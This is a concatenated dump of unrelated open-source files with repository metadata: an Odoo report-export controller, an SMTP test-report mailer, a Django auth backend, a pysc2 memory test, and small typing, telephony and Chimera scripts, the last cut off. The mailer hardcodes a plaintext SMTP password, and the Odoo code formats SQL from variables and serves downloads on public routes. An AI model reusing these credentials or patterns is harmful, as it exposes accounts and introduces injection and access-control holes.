self._current_consumer = self._HEADER
else:
self._current_consumer = self._BUFFER_HEADER
def _assume_text(self, fragment):
if not isinstance(fragment, six.text_type):
raise ValidationError("expected text fragment but received binary fragment for %s" % (self._current_consumer.__name__))
def _assume_binary(self, fragment):
if not isinstance(fragment, six.binary_type):
raise ValidationError("expected binary fragment but received text fragment for %s" % (self._current_consumer.__name__))
| [
"wgyumg@mgail.com"
] | wgyumg@mgail.com |
093fc662077fab8d376ec677f4b1a61b8270631e | 25ebc03b92df764ff0a6c70c14c2848a49fe1b0b | /daily/20191012/example_metashape/17walker.py | 3c668d9b7ae518dec2b9f57007d8896ff261d94c | [] | no_license | podhmo/individual-sandbox | 18db414fafd061568d0d5e993b8f8069867dfcfb | cafee43b4cf51a321f4e2c3f9949ac53eece4b15 | refs/heads/master | 2023-07-23T07:06:57.944539 | 2023-07-09T11:45:53 | 2023-07-09T11:45:53 | 61,940,197 | 6 | 0 | null | 2022-10-19T05:01:17 | 2016-06-25T11:27:04 | Python | UTF-8 | Python | false | false | 1,612 | py | import typing as t
T = t.TypeVar("T")
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
MetaData = t.Optional[t.Dict[str, t.Any]]
class Field(t.Generic[F]):
wrapped: F
def __init__(self, wrapped: F):
self.wrapped = wrapped
try:
self.__doc__ = wrapped.__doc__
except: # noqa
pass
self.metadata = {"doc": getattr(self, "__doc__", None)}
def __get__(self, obj, type=None) -> T:
return self.wrapped(obj)
def get_metadata(cls: t.Type[t.Any], name: str) -> t.Optional[MetaData]:
prop = cls.__dict__.get(name)
if prop is None:
return None
return prop.metadata
def walk(
typ: t.Type[t.Any]
) -> t.Iterable[t.Tuple[str, t.Type[t.Any], t.Optional[MetaData]]]:
for fieldname, fieldtype in t.get_type_hints(typ).items():
yield fieldname, fieldtype, get_metadata(typ, fieldname)
class Person:
name: str
age: int = 0
def field(fn: F) -> Field[F]:
return Field(fn)
class WPerson(Person):
@field
def name(self) -> str:
"""name docstring"""
return "<name>"
@field
def nickname(self) -> t.Optional[str]:
"""nickname docstring"""
return None
print(WPerson.nickname, WPerson.age)
print(get_metadata(WPerson, "nickname"))
print("----------------------------------------")
for x in walk(WPerson):
print(x)
if t.TYPE_CHECKING:
reveal_type(WPerson.nickname)
reveal_type(WPerson().nickname)
print("========================================")
wp = WPerson()
print(wp.name, wp.nickname)
wp.nickname = "foo"
print(wp.name, wp.nickname)
| [
"ababjam61+github@gmail.com"
] | ababjam61+github@gmail.com |
10434a32e795ec5d304e1fbec30670e8cb3a4881 | 0b51bc6c7a98d07880955a31e147c0c15b1e3151 | /dai_tgg/controllers/controllers.py | 855f610f76a3b62a852f1dbc2ab1f73872d7dd4b | [] | no_license | tu95ctv/duan_mi2 | 72e8bcbad73dfea1b57b69dbfd1c8d48ecebb975 | f1728d99e27fcc18684d50f5719f3dcedcffd755 | refs/heads/master | 2020-04-28T21:30:25.017845 | 2019-07-07T13:25:43 | 2019-07-07T13:25:43 | 175,584,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,900 | py | # -*- coding: utf-8 -*-
from odoo import http
from openerp import http
from openerp.http import request
from openerp.addons.web.controllers.main import serialize_exception,content_disposition
import base64
# from openpyxl import load_workbook
# from cStringIO import StringIO
from odoo.tools.misc import xlwt
from copy import deepcopy
from odoo import api,fields
import datetime
import odoo.addons.web.controllers.pivot as pivot
import json
from odoo.tools import ustr
from collections import deque
from odoo.osv import expression
from dateutil.relativedelta import relativedelta
import pytz
import string
from odoo.addons.tutool.mytools import convert_date_odoo_to_str_vn_date, convert_utc_native_dt_to_gmt7
from unidecode import unidecode
from odoo.addons.downloadwizard.download_tool import download_all_model_by_url
def get_width(num_characters):
return int((1+num_characters) * 256)
def add_header_TrungTamHaTangMang(worksheet,user_id,ROW_TRUNG_TAM,offset_column,normal_style,bold_style,ROW_SUM,KEY_COL,VAL_COL):
cty_bold_style = xlwt.easyxf("font: bold on, name Times New Roman, height 256; align: horiz left, vert centre, wrap 1; alignment: wrap 1")# align: horiz centre, vert centre
ROW_HO_TEN = ROW_TRUNG_TAM+ 1
ROW_TRAM = ROW_TRUNG_TAM + 2
worksheet.write_merge(ROW_TRUNG_TAM, ROW_TRUNG_TAM, 0, 4, u'TRUNG TÂM HẠ TẦNG MẠNG MIỀN NAM\n ĐÀI VIỄN THÔNG HỒ CHÍ MINH',cty_bold_style)
worksheet.row(ROW_TRUNG_TAM).height_mismatch = True
worksheet.row(ROW_TRUNG_TAM).height = 256*5
worksheet.write(ROW_HO_TEN,KEY_COL,u'Họ và Tên',normal_style)
worksheet.write(ROW_HO_TEN, VAL_COL,user_id.name,bold_style)
worksheet.write(ROW_TRAM,KEY_COL, u'Trạm',normal_style)
worksheet.write(ROW_TRAM,VAL_COL ,user_id.department_id.name,bold_style)
worksheet.write(ROW_SUM, KEY_COL,u'Điểm Tổng LĐ Chấm',normal_style)
worksheet.write(ROW_SUM, KEY_COL,u'Điểm Tổng Nhân Viên Chấm',normal_style)
def add_title(FIELDNAME_FIELDATTR,cvi_fields,offset_column,worksheet,ROW_TITLE):
header_bold_style = xlwt.easyxf("font: bold on, name Times New Roman, height 240 ; pattern: pattern solid, fore_colour gray25;borders: left thin, right thin, top thin, bottom thin")
for title_column_index, field_from_my_FIELDNAME_FIELDATTR in enumerate(FIELDNAME_FIELDATTR):
title_column_index += offset_column
f_name, FIELDATTR = field_from_my_FIELDNAME_FIELDATTR
is_not_model_field = FIELDATTR.get('is_not_model_field')
if is_not_model_field:
f_string =FIELDATTR.get('string') or f_name
else:
field = cvi_fields[f_name]
f_string = field.string
worksheet.write(ROW_TITLE, title_column_index, f_string, header_bold_style)
width = FIELDATTR.get('width')
if not width :
width = get_width(len(f_string))
worksheet.col(title_column_index).width = width
def add_1_cvi_for_1_person(worksheet,FIELDNAME_FIELDATTR, r,offset_column,stt,row_index,normal_border_style):
for title_column_index, field_from_my_FIELDNAME_FIELDATTR in enumerate(FIELDNAME_FIELDATTR):
title_column_index += offset_column
f_name,FIELDATTR = field_from_my_FIELDNAME_FIELDATTR
is_not_model_field = FIELDATTR.get('is_not_model_field')
if is_not_model_field:
if f_name=='stt':
val = stt
else:
val = getattr(r, f_name)
func = FIELDATTR.get('func',None)
if func:
val = func(val)
if val == False:
val = u''
worksheet.write(row_index, title_column_index, val, normal_border_style)
def add_sum_info(worksheet,FIELDNAME_FIELDATTR,offset_column,num2alpha,ROW_TITLE,ROW_SUM,VAL_COL,last_row_index):
for title_column_index, field_from_my_FIELDNAME_FIELDATTR in enumerate(FIELDNAME_FIELDATTR):
title_column_index += offset_column
f_name,FIELDATTR = field_from_my_FIELDNAME_FIELDATTR
if FIELDATTR.get('is_not_model_field'):
pass
else:
if FIELDATTR.get('sum'):
intRowSum = FIELDATTR.get('row_sum')
intColSum = FIELDATTR.get('col_sum')
column_index_apha = num2alpha[title_column_index]
# worksheet.write(ROW_TITLE, title_column_index, xlwt.Formula('SUM(%s%s:%s%s)'%(column_index_apha,ROW_TITLE + 2,column_index_apha,row_index)))
worksheet.write(intRowSum, intColSum, xlwt.Formula('SUM(%s%s:%s%s)'%(column_index_apha,ROW_TITLE + 2,column_index_apha,last_row_index)))
def filter_department_ids(department_ids):
if department_ids:
export_department_ids = department_ids.ids
else:
export_department_ids = [request.env.user.department_id.id]
return export_department_ids
def generate_domain_date_and_department(dlcv_obj, theo_sql = False):
domain = []
if theo_sql == True:
where_clause_list = []
department_ids = dlcv_obj.department_ids
export_department_ids = filter_department_ids(department_ids)
if export_department_ids:
if theo_sql:
department_clause = ("cvi.department_id in %s"%(tuple(export_department_ids),)).replace(',)',')')
where_clause_list.append(department_clause)
else:
domain.append(('department_id','in',export_department_ids))
else:
raise ValueError(u'Bạn không có quyền xem Báo cáo của những trạm đó')
if dlcv_obj.chon_thang ==u'Tháng Này':
utc_time = datetime.datetime.now()
vn_time = convert_utc_native_dt_to_gmt7(utc_time)
vn_thang_nay_date_begin = vn_time.strftime('%Y-%m-01')
vn_time_offset_thang_sau = vn_time + relativedelta(months=1)
vn_thang_nay_date_end = vn_time_offset_thang_sau.strftime('%Y-%m-01')
if theo_sql == False:
domain = expression.AND([[('ngay_bat_dau','>=',vn_thang_nay_date_begin),('ngay_bat_dau','<',vn_thang_nay_date_end)],domain])
else:
where_clause_list.append('cvi.ngay_bat_dau >= %s'%vn_thang_nay_date_begin)
where_clause_list.append('cvi.ngay_bat_dau < %s'%vn_thang_nay_date_end)
elif dlcv_obj.chon_thang ==u'Tháng Trước':
utc_time = datetime.datetime.now()
vn_time = convert_utc_native_dt_to_gmt7(utc_time)
thang_truoc_time = vn_time + relativedelta(months=-1)
thang_truoc_date_begin = thang_truoc_time.strftime('%Y-%m-01')
thang_truoc_date_end = vn_time.strftime('%Y-%m-01')
if theo_sql == False:
domain = expression.AND([[('ngay_bat_dau','>=',thang_truoc_date_begin),('ngay_bat_dau','<',thang_truoc_date_end)],domain])
else:
where_clause_list.append("cvi.ngay_bat_dau >= '%s'"%thang_truoc_date_begin)
where_clause_list.append("cvi.ngay_bat_dau < '%s'"%thang_truoc_date_end)
else:
if dlcv_obj.ngay_bat_dau_filter:
if theo_sql == False:
domain = expression.AND([[('ngay_bat_dau','>=',dlcv_obj.ngay_bat_dau_filter)],domain])
else:
where_clause_list.append("cvi.ngay_bat_dau >= '%s'"%dlcv_obj.ngay_bat_dau_filter)
if dlcv_obj.ngay_ket_thuc_filter:
if theo_sql == False:
domain = expression.AND([[('ngay_bat_dau','<=',dlcv_obj.ngay_ket_thuc_filter)],domain])
else:
where_clause_list.append("cvi.ngay_bat_dau <= '%s'"%dlcv_obj.ngay_ket_thuc_filter)
if theo_sql:
where_clause = ' and '.join (where_clause_list)
return where_clause
else:
return domain
def download_cvi(dlcv_obj):
num2alpha = dict(zip(range(0, 26), string.ascii_uppercase))
normal_style = xlwt.easyxf("font: name Times New Roman, height 240")
normal_border_style = xlwt.easyxf("font: name Times New Roman, height 240 ;borders: left thin,right thin, top thin, bottom thin")
bold_style = xlwt.easyxf("font: bold on")
department_ids = dlcv_obj.department_ids
export_department_ids = filter_department_ids(department_ids)
user_ids = request.env['res.users'].search([('department_id','in',export_department_ids)])
workbook = xlwt.Workbook()
offset_column = 0
ROW_TRUNG_TAM=0
ROW_SUM = ROW_TRUNG_TAM + 3
KEY_COL = offset_column + 3
VAL_COL = offset_column + 4
ROW_TITLE = ROW_TRUNG_TAM + 5
FIELDNAME_FIELDATTR = [
('stt',{'is_not_model_field':True,'string':u'STT'}),
('ngay_bat_dau',{'func':convert_date_odoo_to_str_vn_date,'width':get_width(10)}),
('code',{}),('tvcv_id_name',{'width':get_width(40)}),
('noi_dung',{'width':get_width(40)}),
('diem_tvcv',{}),('so_luong',{}),('so_lan',{}),
('diemtc',{'sum':True, 'row_sum':ROW_SUM+1, 'col_sum':VAL_COL}),
('diemld',{'sum':True,'row_sum':ROW_SUM, 'col_sum':VAL_COL}),
]
domain = []
domain_date = generate_domain_date_and_department(dlcv_obj)
for user_id in user_ids:
domain_user = [('user_id','=',user_id.id),('loai_record','=',u'Công Việc')]
domain = expression.AND([domain_user, domain_date])
worksheet = workbook.add_sheet(user_id.name,cell_overwrite_ok=True)
add_header_TrungTamHaTangMang(worksheet,user_id,ROW_TRUNG_TAM,offset_column,normal_style,bold_style,ROW_SUM,KEY_COL,VAL_COL)
cvi_fields = request.env['cvi']._fields
add_title(FIELDNAME_FIELDATTR, cvi_fields, offset_column, worksheet, ROW_TITLE)
row_index = ROW_TITLE + 1
stt = 1
person_records = request.env['cvi'].search(domain,order='ngay_bat_dau')
for r in person_records:#request.env['cvi'].search([]):
add_1_cvi_for_1_person(worksheet,FIELDNAME_FIELDATTR, r,offset_column, stt, row_index, normal_border_style)
row_index +=1
stt += 1
add_sum_info(worksheet,FIELDNAME_FIELDATTR,offset_column,num2alpha,ROW_TITLE,ROW_SUM,VAL_COL,row_index)
return workbook
class DownloadCvi(http.Controller):
@http.route('/web/binary/download_cvi_by_userlist',type='http', auth="public")
def download_cvi_by_userlist(self,model, id, **kw):
dlcv_obj = request.env[model].browse(int(id))
where_clause = generate_domain_date_and_department (dlcv_obj, theo_sql = True)
sql_cmd = '''select cvi.user_id,sum(diemtc),u.login,p.name from cvi inner join res_users as u on cvi.user_id = u.id inner join res_partner as p on u.partner_id = p.id %s group by cvi.user_id ,u.login,p.name'''
sql_cmd = sql_cmd%((' where ' + where_clause )if where_clause else '')
request.env.cr.execute(sql_cmd)
rsul = request.env.cr.fetchall()
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet('Sheet 1')
normal_style = xlwt.easyxf("font: name Times New Roman, height 240")
worksheet.write(0,0,'STT',normal_style)
worksheet.write(0,1,u'Tên',normal_style)
worksheet.write(0,2,u'Điểm', normal_style)
row_index = 1
stt =1
for u_id,diem,login,name in rsul:
worksheet.write(row_index,0,stt,normal_style)
worksheet.write(row_index,1,login,normal_style)
worksheet.write(row_index,2,diem,normal_style)
row_index += 1
stt +=1
response = request.make_response(None,
headers=[('Content-Type', 'application/vnd.ms-excel'),
('Content-Disposition', 'attachment; filename=table_cv_%s_%s.xls;'%(request.env.user.name, datetime.datetime.now().strftime('%d_%m_%H_%M')))],
)
workbook.save(response.stream)
return response
@http.route('/web/binary/download_cvi',type='http', auth="public")
def download_cvi(self,model, id, **kw):
dlcv_obj = request.env[model].browse(int(id))
workbook = download_cvi(dlcv_obj)
response = request.make_response(None,
headers=[('Content-Type', 'application/vnd.ms-excel'),
('Content-Disposition', 'attachment; filename=chi_tiet_p3_%s_%s.xls;target=blank' %(unidecode(dlcv_obj.department_ids.name).replace(' ','_'), datetime.datetime.now().strftime('%d_%m_%H_%M')))],
)
workbook.save(response.stream)
return response
@http.route('/web/binary/download_model',type='http', auth="public")
def download_all_model_controller(self,**kw):
response = download_all_model_by_url(kw)
return response
| [
"nguyenductu@gmail.com"
] | nguyenductu@gmail.com |
d2f89f70fa06f176959af33099a52a2d67651e66 | f0ee6af776b92f98881ce9dfb2f4df0b760f1ca6 | /dublicate.py | 20945ad7daa791b4a847395e6e574e7a57b39e47 | [] | no_license | madhu20336/dictionary | 4cb8e240b2167d6e3071b4eb867977a3e25b9479 | a9f6d1e4887ae4300ea034e2bb6054cfad91d610 | refs/heads/main | 2023-04-23T10:30:09.114402 | 2021-05-15T11:38:58 | 2021-05-15T11:38:58 | 367,615,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | # dict={"A":1,"B":2,"C":3,"C":5,"B":6,"A":7}
# for i in dict.items():
# if i in dict:
# del dict[i]
# print(dict)
| [
"noreply@github.com"
] | madhu20336.noreply@github.com |
c0430d2eeb1e8011132f75363c50f7f85c37b417 | 8524e35d5848e7c6dcc774d35818c12bbc01bf67 | /taocode2/apps/user/auth.py | bbc40f94e10c64987528b578c36450d890be0cfb | [] | no_license | imbugs/taobaocode | 80f49e1829807b4751b2a6e6949c850843b996a7 | a8fbd7fc2f0d3f88eaeda7d944bcc688dee47b18 | refs/heads/master | 2021-01-02T23:06:29.518047 | 2013-05-16T03:34:47 | 2013-05-16T03:34:47 | 10,093,033 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,390 | py | #
# Copyright (C) 2011 Taobao .Inc
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://code.taobao.org/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://code.taobao.org/.
from taocode2.models import User, secpwd
from taocode2.helper import consts
from django.db.models import Q
__author__ = 'luqi@taobao.com'
class UserAuthBackend:
def authenticate(self, username=None, password=None):
try:
user = User.objects.get(Q(name__iexact=username) | Q(email__iexact=username),
status = consts.USER_ENABLE)
except User.DoesNotExist:
return None
if secpwd(password) != user.password:
return None
return user
def get_user(self, user_id):
try:
user = User.objects.get(pk=user_id)
return user
except User.DoesNotExist:
return None
def has_perm(self, user, perm):
return False
def supports_object_permissions(self):
return False
def supports_anonymous_user(self):
return False
| [
"imbugs@126.com"
] | imbugs@126.com |
f6b9b2ad4df858c10c4208fc0b3d6b28d0608d5f | d87f6d9e769709def3efcf30230cd8bf6ac2cef7 | /WWTest/util/sendEmailWithLink.py | 7bc4933f1049b445a170df1cade57d1a844b7237 | [] | no_license | wawj901124/centos8xitong | 876dcc45b895871119404ad1899ca59ab5dd90b6 | 81fc0d1151e3172ceec2093b035d2cd921e1a433 | refs/heads/master | 2023-02-23T22:33:22.314433 | 2021-01-31T01:54:35 | 2021-01-31T01:54:35 | 290,476,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,028 | py | import smtplib #导入smtplib,用来发送邮件和连接服务器
from email.mime.text import MIMEText #导入MIMEText,用来组织邮件格式内容
from email.mime.multipart import MIMEMultipart #添加附件用
from email.mime.application import MIMEApplication #添加附件用
class SendEmail:
globals() ['send_user'] = "xiang_kaizheng@wanweitech.com" #构建全局变量发送者
globals() ['email_host'] = "smtp.263.net" #构建全局变量邮件服务器的email_host(smpt)
globals() ['password'] = "wanwei889" #构建全局变量邮件服务器的password,邮箱服务器发送者的登录密码
# globals() ['send_user'] = "410287958@qq.com" #构建全局变量发送者
# globals() ['email_host'] = "smtp.qq.com" #构建全局变量邮件服务器的email_host(smpt)
# globals() ['password'] = "wbfiwwnajhrabijg" #构建全局变量邮件服务器的password,邮箱服务器发送者的登录密码
def send_mail(self,user_list,sub,content,filenamepath,reporturl=None): #收件人,主题,内容
user = "Mushishi" +"<"+send_user+">" #构建发送者
# message = MIMEText(content, _subtype='plain',_charset='utf-8') #构建内容,格式,编码
message = MIMEMultipart() #Multipart就是多个部分
if reporturl != None: #如果传递reporturl,则发送,如果没有,则不发送
html_msg = \
"""
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>测试报告</title>
</head>
<body>
<h1>报告网址:<a href="%s">%s</a></h2>
</html>
""" % (reporturl,reporturl)
# html 内容
content_html = MIMEText(html_msg, "html", "utf-8") #使用HTML构造正文,HTML正文要在plain正文的前面,否则plain正文不会显示
message.attach(content_html) #使用HTML构造正文
message.attach(MIMEText(content, _subtype='plain', _charset='utf-8')) #构建正文内容,格式,编码
message['Subject'] = sub #定义邮件的主题
message['From'] = user #定义邮件发送者
message['To'] = ";".join(user_list) #以分号为分隔符将收件人分割开来
#附件内容:
htmlpart = MIMEApplication(open(filenamepath, 'rb').read())
htmlpart.add_header('Content-Disposition', 'attachment', filename=filenamepath)
message.attach(htmlpart)
server = smtplib.SMTP() #构建一个邮件服务器
server.connect(email_host) #连接到邮箱服务器
server.login(send_user,password) #登录邮箱
server.sendmail(user,user_list,message.as_string()) #发送邮件,发送者user,接收者user_list,发送内容message,需要用as_string()转义成字符串发送
server.close() #关闭服务器
def run_send(self,pass_count,fail_count,error_count,filenamepath,userlist=None,emailtitle=None):
pass_num = float(pass_count) #转换为浮点类型
fail_num = float(fail_count) #转换为浮点类型
error_num = float(error_count) #转换为浮点类型
count_num = pass_num + fail_num +error_num
#90%,百分比
pass_result = "%.2f%%" %(pass_num/count_num*100) #%.2f,浮点型数据小数点后保留两位,%%,转义百分号
fail_result = "%.2f%%" % (fail_num/count_num*100) #失败率
error_result = "%.2f%%" % (error_num / count_num * 100) # 失败率
if userlist == None:
user_list = ['xiang_kaizheng@wanweitech.com']
else:
user_list = userlist
if emailtitle == None:
sub = "自动化测试报告"
else:
sub = emailtitle
content = "此次一共执行用例个数为%s个,成功个数为%s个,失败个数为%s个,错误个数为%s个,通过率为%s,失败率为的%s,错误率为%s." %(count_num,pass_num,fail_num,error_num,pass_result,fail_result,error_result)
self.send_mail(user_list,sub,content,filenamepath) #调用本类发送邮件函数
def run_send_with_report(self,pass_count,fail_count,error_count,filenamepath,userlist=None,emailtitle=None,reporturl=None):
pass_num = float(pass_count) #转换为浮点类型
fail_num = float(fail_count) #转换为浮点类型
error_num = float(error_count) #转换为浮点类型
count_num = pass_num + fail_num +error_num
#90%,百分比
pass_result = "%.2f%%" %(pass_num/count_num*100) #%.2f,浮点型数据小数点后保留两位,%%,转义百分号
fail_result = "%.2f%%" % (fail_num/count_num*100) #失败率
error_result = "%.2f%%" % (error_num / count_num * 100) # 失败率
if userlist == None:
user_list = ['xiang_kaizheng@wanweitech.com']
else:
user_list = userlist
if emailtitle == None:
sub = "自动化测试报告"
else:
sub = emailtitle
content = "此次一共执行用例个数为%s个,成功个数为%s个,失败个数为%s个,错误个数为%s个,通过率为%s,失败率为的%s,错误率为%s." %(count_num,pass_num,fail_num,error_num,pass_result,fail_result,error_result)
self.send_mail(user_list,sub,content,filenamepath,reporturl=reporturl) #调用本类发送邮件函数
if __name__ == '__main__':
sen = SendEmail() #实例化
# sen.send_main([2,3,4],[5,6,7],'../report/01_report.html')
user_list = ['xiang_kaizheng@wanweitech.com']
emailtitle = "商户后台-登录_自动化测试报告"
# sen.run_send(2,0,0,'1.txt',user_list,emailtitle,)
sen.run_send(2,0,0,'1.txt',user_list,emailtitle)
sen.run_send_with_report(2,0,0,'1.txt',user_list,emailtitle,reporturl="123")
print("邮件已发送") | [
"wawj900805"
] | wawj900805 |
b7c60f81e448d17ba6e9307cc65b5f717b19cba0 | 7d1e66fec4675572d75d30c632406242973d84aa | /pysc2/bin/mem_leak_check.py | 27efe04d1d88ed96d5c2e341358cf597adea1a63 | [
"Apache-2.0"
] | permissive | monarchBacilluscoli/pysc2 | 91cdd0c85598f64f4c1c8b36126968bc04ac84a4 | e5df7d41205fdb2e205dac2777305f3f6a404e05 | refs/heads/master | 2020-03-22T17:35:57.294868 | 2018-07-09T14:18:38 | 2018-07-09T14:20:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,909 | py | #!/usr/bin/python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for memory leaks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from absl import app
from future.builtins import range # pylint: disable=redefined-builtin
import psutil
from pysc2 import maps
from pysc2 import run_configs
from s2clientprotocol import common_pb2 as sc_common
from s2clientprotocol import sc2api_pb2 as sc_pb
def main(unused_argv):
interface = sc_pb.InterfaceOptions()
interface.raw = True
interface.score = True
interface.feature_layer.width = 24
interface.feature_layer.resolution.x = 84
interface.feature_layer.resolution.y = 84
interface.feature_layer.minimap_resolution.x = 64
interface.feature_layer.minimap_resolution.y = 64
timeline = []
start = time.time()
run_config = run_configs.get()
proc = run_config.start()
process = psutil.Process(proc.pid)
def add(s):
cpu = process.cpu_times().user
mem = process.memory_info().rss / 2 ** 20 # In Mb
timeline.append((time.time() - start, cpu, mem, s))
if mem > 2000:
raise Exception("2gb mem limit exceeded")
try:
add("Started")
controller = proc.controller
map_inst = maps.get("Simple64")
create = sc_pb.RequestCreateGame(
realtime=False, disable_fog=False,
local_map=sc_pb.LocalMap(map_path=map_inst.path,
map_data=map_inst.data(run_config)))
create.player_setup.add(type=sc_pb.Participant)
create.player_setup.add(type=sc_pb.Computer, race=sc_common.Random,
difficulty=sc_pb.CheatInsane)
join = sc_pb.RequestJoinGame(race=sc_common.Random, options=interface)
controller.create_game(create)
add("Created")
controller.join_game(join)
add("Joined")
for _ in range(30):
for i in range(2000):
controller.step(16)
obs = controller.observe()
if obs.player_result:
add("Lost")
break
if i % 100 == 0:
add(i)
controller.restart()
add("Restarted")
add("Done")
except KeyboardInterrupt:
pass
finally:
proc.close()
print("Timeline:")
for t in timeline:
print("[%7.3f] cpu: %5.1f s, mem: %4d M; %s" % t)
if __name__ == "__main__":
app.run(main)
| [
"tewalds@google.com"
] | tewalds@google.com |
05e26f13c90bcb7032e3df3e79b731b10641e170 | ee364e80138d6a2435ff069f3665b4ce36915e40 | /samples/set_pstn_black_list_item.py | 71dbaecc96a3afc048986596279305350ea06b56 | [
"MIT"
] | permissive | antoniotaranto/apiclient-python | 355b21efa7f526cc1f4edec2d45e68ec87b3e327 | 64a727ebecac27ce162f3f198edeb065ab8a6ca0 | refs/heads/master | 2022-02-18T05:14:01.075669 | 2019-09-02T09:58:57 | 2019-09-02T09:58:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | from voximplant.apiclient import VoximplantAPI, VoximplantException
if __name__ == "__main__":
voxapi = VoximplantAPI("credentials.json")
PSTN_BLACKLIST_ID = 1
PSTN_BLACKLIST_PHONE = "123456789"
try:
res = voxapi.set_pstn_black_list_item(PSTN_BLACKLIST_ID, PSTN_BLACKLIST_PHONE)
except VoximplantException as e:
print("Error: {}".format(e.message))
print(res)
| [
"andrey@voximplant.com"
] | andrey@voximplant.com |
623dda1de8d3d0b4d2a0fc34c18ffdade7630b7f | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_45120.py | 8c8adacdf9176f00eb63cc6fa601503552577bae | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,836 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((352.476, 638.724, 582.291), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((358.605, 597.696, 528.921), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((360.006, 538.129, 472.639), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((260.763, 536.832, 570.55), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((400.919, 419.15, 323.421), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((362.689, 603.98, 553.31), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((363.104, 604.26, 554.628), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((383.786, 597.414, 572.349), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((401.914, 576.227, 569.112), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((395.122, 554.727, 585.676), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((393.041, 537.464, 607.641), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((408.041, 558.029, 620.05), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((361.849, 632.084, 558.034), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((460.895, 488.424, 680.522), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((478.101, 417.206, 492.149), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((478.101, 417.206, 492.149), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
